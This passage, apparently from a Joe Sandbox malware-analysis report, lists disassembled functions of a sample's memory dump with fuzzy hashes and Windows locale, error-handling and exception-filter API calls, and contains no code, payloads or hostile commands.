                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: ErrorLast_free$InfoLocale
                • String ID:
                • API String ID: 2003897158-0
                • Opcode ID: 7fdb9eae46c6ba3b5a36b0518353a8bd4f55763bdc00aafb5f7d3176a1bb21ff
                • Instruction ID: 1ca29b9d0090b90d564c465d374cb2f920ec6ca350b1f3ba8660b4cb7f04b86f
                • Opcode Fuzzy Hash: 7fdb9eae46c6ba3b5a36b0518353a8bd4f55763bdc00aafb5f7d3176a1bb21ff
                • Instruction Fuzzy Hash: 4F21847261120AABDB68AF25DC41EBA77BCEF44310F10407AFE15DA241EB74ED40EB55
                APIs
                  • Part of subcall function 00CE6C20: GetLastError.KERNEL32(00000000,00000000,?,00CE7A07,?,00000000,00000000,?,00CE7EC1,00000000,00000000,00000000,00000000,8B18EC83,00D14198,00000010), ref: 00CE6C25
                  • Part of subcall function 00CE6C20: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00CE7EC1,00000000,00000000,00000000,00000000,8B18EC83,00D14198,00000010,00CE0F62,00000000,00000000,00000000), ref: 00CE6CC3
                • EnumSystemLocalesW.KERNEL32(00CF2389,00000001,00000000,?,-00000050,?,00CF29B7,00000000,?,?,?,00000055,?), ref: 00CF22D5
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: ErrorLast$EnumLocalesSystem
                • String ID:
                • API String ID: 2417226690-0
                • Opcode ID: 20b8d37faef24b7eea8091423e0ce497e271d5ce8222cd853a07cd89d4757b46
                • Instruction ID: d926c590a104636aa9a4f538b8ad0ae07f15b44d537f357d811ab395f0579200
                • Opcode Fuzzy Hash: 20b8d37faef24b7eea8091423e0ce497e271d5ce8222cd853a07cd89d4757b46
                • Instruction Fuzzy Hash: 00114C3B2007099FDB189F79D8916BAB791FF80368B14442DEA8687740D371B902D740
                APIs
                  • Part of subcall function 00CE6C20: GetLastError.KERNEL32(00000000,00000000,?,00CE7A07,?,00000000,00000000,?,00CE7EC1,00000000,00000000,00000000,00000000,8B18EC83,00D14198,00000010), ref: 00CE6C25
                  • Part of subcall function 00CE6C20: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00CE7EC1,00000000,00000000,00000000,00000000,8B18EC83,00D14198,00000010,00CE0F62,00000000,00000000,00000000), ref: 00CE6CC3
                • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00CF2686,00000000,00000000,?), ref: 00CF2834
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: ErrorLast$InfoLocale
                • String ID:
                • API String ID: 3736152602-0
                • Opcode ID: 0168f42d677a3118c540a54940499929b52ee07c128fd946b385b6fcb5d956b5
                • Instruction ID: 2b1c002a24d5b5d893a0c64e928251c367b8115a2c1f6b178a9321603addf923
                • Opcode Fuzzy Hash: 0168f42d677a3118c540a54940499929b52ee07c128fd946b385b6fcb5d956b5
                • Instruction Fuzzy Hash: A6F0F933600219ABDB2856218806BBA7B68DF40794F140429EE66B31C0DA34FE41C5D1
                APIs
                  • Part of subcall function 00CE6C20: GetLastError.KERNEL32(00000000,00000000,?,00CE7A07,?,00000000,00000000,?,00CE7EC1,00000000,00000000,00000000,00000000,8B18EC83,00D14198,00000010), ref: 00CE6C25
                  • Part of subcall function 00CE6C20: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00CE7EC1,00000000,00000000,00000000,00000000,8B18EC83,00D14198,00000010,00CE0F62,00000000,00000000,00000000), ref: 00CE6CC3
                  • Part of subcall function 00CE6C20: _free.LIBCMT ref: 00CE6C82
                  • Part of subcall function 00CE6C20: _free.LIBCMT ref: 00CE6CB8
                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00CF21C5
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: ErrorLast_free$InfoLocale
                • String ID: utf8
                • API String ID: 2003897158-905460609
                • Opcode ID: b1e81b575414f4388359a34c5ea00a79d1fe2c168ca5d30315ef4cd7fd7b907f
                • Instruction ID: ebb12d329e9006f354ced7c030407de725955d77d45e5691cb06ca5ce48a8648
                • Opcode Fuzzy Hash: b1e81b575414f4388359a34c5ea00a79d1fe2c168ca5d30315ef4cd7fd7b907f
                • Instruction Fuzzy Hash: 30F02232610249ABCB18AF34DC46EBE73ECDB48324F10007AFB02D7381EA34AD019760
                APIs
                  • Part of subcall function 00CE6C20: GetLastError.KERNEL32(00000000,00000000,?,00CE7A07,?,00000000,00000000,?,00CE7EC1,00000000,00000000,00000000,00000000,8B18EC83,00D14198,00000010), ref: 00CE6C25
                  • Part of subcall function 00CE6C20: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00CE7EC1,00000000,00000000,00000000,00000000,8B18EC83,00D14198,00000010,00CE0F62,00000000,00000000,00000000), ref: 00CE6CC3
                • EnumSystemLocalesW.KERNEL32(00CF25DC,00000001,FFFFFFFF,?,-00000050,?,00CF297B,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00CF2348
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: ErrorLast$EnumLocalesSystem
                • String ID:
                • API String ID: 2417226690-0
                • Opcode ID: 6ba1a11a731704abdf46a99a9cbf20fbbf8ad5233c712a49f03bcc65218643f7
                • Instruction ID: fc2ec2cd570ea39035018e7a6a1a100cf12ea25ed09ec5c2b94a10c1aa818a1f
                • Opcode Fuzzy Hash: 6ba1a11a731704abdf46a99a9cbf20fbbf8ad5233c712a49f03bcc65218643f7
                • Instruction Fuzzy Hash: 24F0467630030C1FDB145F359881B7A7B95EF81368B19442DFA098B690C6759D42CB50
                APIs
                  • Part of subcall function 00CE2540: EnterCriticalSection.KERNEL32(-00048871,?,00CE3825,00000000,00D13FB8,0000000C,00CE37EC,?,?,00CEA613,?,?,00CE6DC2,00000001,00000364,00000006), ref: 00CE254F
                • EnumSystemLocalesW.KERNEL32(00CE82FF,00000001,00D141D8,0000000C,00CE872A,00000000), ref: 00CE8344
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: CriticalEnterEnumLocalesSectionSystem
                • String ID:
                • API String ID: 1272433827-0
                • Opcode ID: 149e00b001663797b37b873a8639864ffcd2091bba0ed64c9e02391d4f78014b
                • Instruction ID: 1904077a788cf153ebda985d416e1c9c4b00b81e13a857efe84faed5fb68a292
                • Opcode Fuzzy Hash: 149e00b001663797b37b873a8639864ffcd2091bba0ed64c9e02391d4f78014b
                • Instruction Fuzzy Hash: CEF03776A41300EFD700DF99E852B9DBBF0EB49721F10802AF915DB3A0CB7589859F55
                APIs
                  • Part of subcall function 00CE6C20: GetLastError.KERNEL32(00000000,00000000,?,00CE7A07,?,00000000,00000000,?,00CE7EC1,00000000,00000000,00000000,00000000,8B18EC83,00D14198,00000010), ref: 00CE6C25
                  • Part of subcall function 00CE6C20: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00CE7EC1,00000000,00000000,00000000,00000000,8B18EC83,00D14198,00000010,00CE0F62,00000000,00000000,00000000), ref: 00CE6CC3
                • EnumSystemLocalesW.KERNEL32(00CF2171,00000001,FFFFFFFF,?,?,00CF29D9,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00CF224F
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: ErrorLast$EnumLocalesSystem
                • String ID:
                • API String ID: 2417226690-0
                • Opcode ID: 379aa76ca9cb893011eaf74dd92b781d5c8fe0c234767e79470dad7e3ea91d8f
                • Instruction ID: f33aea8361c97dafc0576c7e428b434a93f9f5285ab2861a65023b3ee02a732c
                • Opcode Fuzzy Hash: 379aa76ca9cb893011eaf74dd92b781d5c8fe0c234767e79470dad7e3ea91d8f
                • Instruction Fuzzy Hash: C3F0E53A30020957DB04AF35DC4577ABF95EFC2760B068059EF198B291C6719942D791
                APIs
                • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00CE5B82,?,20001004,00000000,00000002,?,?,00CE518F), ref: 00CE8862
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: InfoLocale
                • String ID:
                • API String ID: 2299586839-0
                • Opcode ID: fd0090d2051f29a6c75dc53ca11b48f064aec5455aca6edf66f617c3755f7309
                • Instruction ID: 9d8d850d7df4545279c9f3aa179ba5d678f0fadb5da6c19088167de38d712e72
                • Opcode Fuzzy Hash: fd0090d2051f29a6c75dc53ca11b48f064aec5455aca6edf66f617c3755f7309
                • Instruction Fuzzy Hash: 47E04F36540258BBCF122F62DC08AAE3F15EF44761F008021FE1DB52A1CF328921BAA5
                APIs
                • SetUnhandledExceptionFilter.KERNEL32(Function_0002A464,00CD9F78), ref: 00CDA45D
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: ExceptionFilterUnhandled
                • String ID:
                • API String ID: 3192549508-0
                • Opcode ID: 265a5683f0c5aa8369cd590305edcc20f518098e4363e0277ad083b2bca7821a
                • Instruction ID: 7cfba621601a6d113c02195d727ceb1c22f2e37cb0e2c82d5a7a4969d01987c8
                • Opcode Fuzzy Hash: 265a5683f0c5aa8369cd590305edcc20f518098e4363e0277ad083b2bca7821a
                • Instruction Fuzzy Hash:
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID:
                • String ID: 0
                • API String ID: 0-4108050209
                • Opcode ID: e95a2fa80e74959b2b2ea43d4c42b3595dc8b2ab61d35824eb6c17c18f79c8ea
                • Instruction ID: 534e97c56772264e0842a4bb01acf892606085257dc174c83941c0ad209984ad
                • Opcode Fuzzy Hash: e95a2fa80e74959b2b2ea43d4c42b3595dc8b2ab61d35824eb6c17c18f79c8ea
                • Instruction Fuzzy Hash: 6F513431A006486ADB389A288CA57BEA799BB03304F18453FD7979B3D1C611DF47B242
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: HeapProcess
                • String ID:
                • API String ID: 54951025-0
                • Opcode ID: f49b63254c64d5e268fe287d450b557d35431f0d10309718ec5ca86ab9595b62
                • Instruction ID: e9f60722995b63e5c2535e38a94dca31dfee671d5c4f6837aafe5011d26737ed
                • Opcode Fuzzy Hash: f49b63254c64d5e268fe287d450b557d35431f0d10309718ec5ca86ab9595b62
                • Instruction Fuzzy Hash: 1EA01138A00300AF83008F38AA283CA3AA8AE002803088028A008C8220EA2080888B22
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c2e0d170d57ee1e946a41bbf938e58e3b5217eb43e69b4df0e5d2b1b34c9a8ba
                • Instruction ID: 47583641829c6bbe6d6e7011cfd8112e382c7421940c87241d9c3e37dd86ddcb
                • Opcode Fuzzy Hash: c2e0d170d57ee1e946a41bbf938e58e3b5217eb43e69b4df0e5d2b1b34c9a8ba
                • Instruction Fuzzy Hash: DE2250B3F515145BDB0CCA5DDCA27EDB2E3AFD8214B0E803DA40AE3345EE79D9158684
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 213bd0ca5e0def71af9b8adabf6a18bf3c4ad2425c1d5aa7b586cb790db2aa18
                • Instruction ID: 2885a73c31931334fb623cdf1bf2fcf6830e4b5ccd8bc10476304c4cfcd79172
                • Opcode Fuzzy Hash: 213bd0ca5e0def71af9b8adabf6a18bf3c4ad2425c1d5aa7b586cb790db2aa18
                • Instruction Fuzzy Hash: 1D322622D29F414DD7239635D862336A358AFB73C4F15D727E82AB5AAAEF29C5C34100
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: ErrorLastProcess_free$CurrentFeatureInfoLocalePresentProcessorTerminate
                • String ID:
                • API String ID: 4283097504-0
                • Opcode ID: 35e7895e06e9fc996610f0ddb6c110f468fdd0cc4f3c7552a36807d4f89540a4
                • Instruction ID: 4cbf39488cfa8fd90d579d6b4080407f20353dddb40a0829a8ea3e06c090b613
                • Opcode Fuzzy Hash: 35e7895e06e9fc996610f0ddb6c110f468fdd0cc4f3c7552a36807d4f89540a4
                • Instruction Fuzzy Hash: 49B11675600749CBDB349F25CC82AB7B3E8EF44304F58452DEF97C6681EA70AA81DB11
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 87e1a8aadd28e4e00bf0e4d38fde6de42de70f88de26c1faa108c8bc75bdbf41
                • Instruction ID: e6ecc6e30feac4e93121ad71a9676e2c3200dcdbe42164aa39ffdf285916008b
                • Opcode Fuzzy Hash: 87e1a8aadd28e4e00bf0e4d38fde6de42de70f88de26c1faa108c8bc75bdbf41
                • Instruction Fuzzy Hash: D6913275A086898FDB11CF68C4907EEBFF2EF5A300F14865DD59197782C7768506CBA0
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 88bf2d99bf448474e4e6d4f50cff443b9dfd7cc93a3921f2950abe0b5466a6fa
                • Instruction ID: 98ecb1d1b6d3b8e4f61ed9027490c9625af5189793e5babde27ec6622efa32bb
                • Opcode Fuzzy Hash: 88bf2d99bf448474e4e6d4f50cff443b9dfd7cc93a3921f2950abe0b5466a6fa
                • Instruction Fuzzy Hash: C0810E70A056458FDB05CFA8D890BEEBBF1FF19300F5842A9D824A7392C7759946CBA0
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9a8cac11eb3fb54afeea15c6071d177ac0b08bd0fefdb9154823390d0885ea8a
                • Instruction ID: e879d825aeeecf65f8c7e639cb3e92d2eedd9e1a0b92b0ccaf3558059c0735ef
                • Opcode Fuzzy Hash: 9a8cac11eb3fb54afeea15c6071d177ac0b08bd0fefdb9154823390d0885ea8a
                • Instruction Fuzzy Hash: FC21B673F2053947770CC47E8C572BDB6E1C68C541745823EE8A6EA2C1D968D917E2E4
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: eb2245a21e541c4cfc6b1a136550276315ea7d2f824d3bc845ae21ee03665149
                • Instruction ID: 652366b079a63d4b6d4a0ce3c640a1b08c6b1df8d31ac1ce98a231901bfe0a36
                • Opcode Fuzzy Hash: eb2245a21e541c4cfc6b1a136550276315ea7d2f824d3bc845ae21ee03665149
                • Instruction Fuzzy Hash: 5D11A373F30C296A675C81698C172BAA5D2EBD825034F433AD926E72C4E8A4DE13D290
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                • Instruction ID: 5360063e7771fea2ad968e3c263f851ff5a5405a8b2a92ff5c0842dcf4bbcc88
                • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                • Instruction Fuzzy Hash: C6110B77240082C3D61C8A2EC5F4ABBA795EAC5320B2F436BF3614B754D322DE579600
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
